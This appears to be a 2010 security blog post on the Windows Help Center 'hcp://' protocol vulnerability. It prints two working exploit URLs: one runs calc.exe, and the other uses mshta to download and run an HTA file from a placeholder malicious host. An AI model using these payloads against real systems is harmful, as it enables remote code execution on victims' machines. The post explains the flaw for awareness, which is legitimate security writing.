Sunday, August 29, 2010

HTA and Help Center Vulnerability

The infamous Help Center vulnerability has been making use of the HTA files to download and execute malicious files on the victim machines. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme "hcp". According to the Full Disclosure the vulnerability is within a js script with insufficient escaping.

To exploit the Help Center vulnerability all you have to do is to make the user click or visit a malicious site (that exploits the vulnerability with an already injected or formulated iframe within it) A working exploit is already available on most of the blogs and security sites.

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A
%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%
A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3
Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%
3C/script%3E

The above is one among the many of the available exploits in the wild. This exploit simply runs calc.exe when executed. Malicious hackers have taken advantage of this vulnerability and have found many ways to run malicious code using this vulnerability. One such way is the usage of HTA files. The trick is to trigger the vulnerability just as the same way as above.

"hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript/defer%3Eeval%28unescape%28%27Run%2528%2522mshta%2520http%253A//www.themaliciousurlhere/malicious.hta%2522%2529%27%29%29"

The above exploit uses the vulnerability to load a malicious HTA file by running the mshta command. The HTA file contains the malicious content that is to be executed. HTA files supports WScript that can be used with the intent to download and execute malicious files.

No comments:

Post a Comment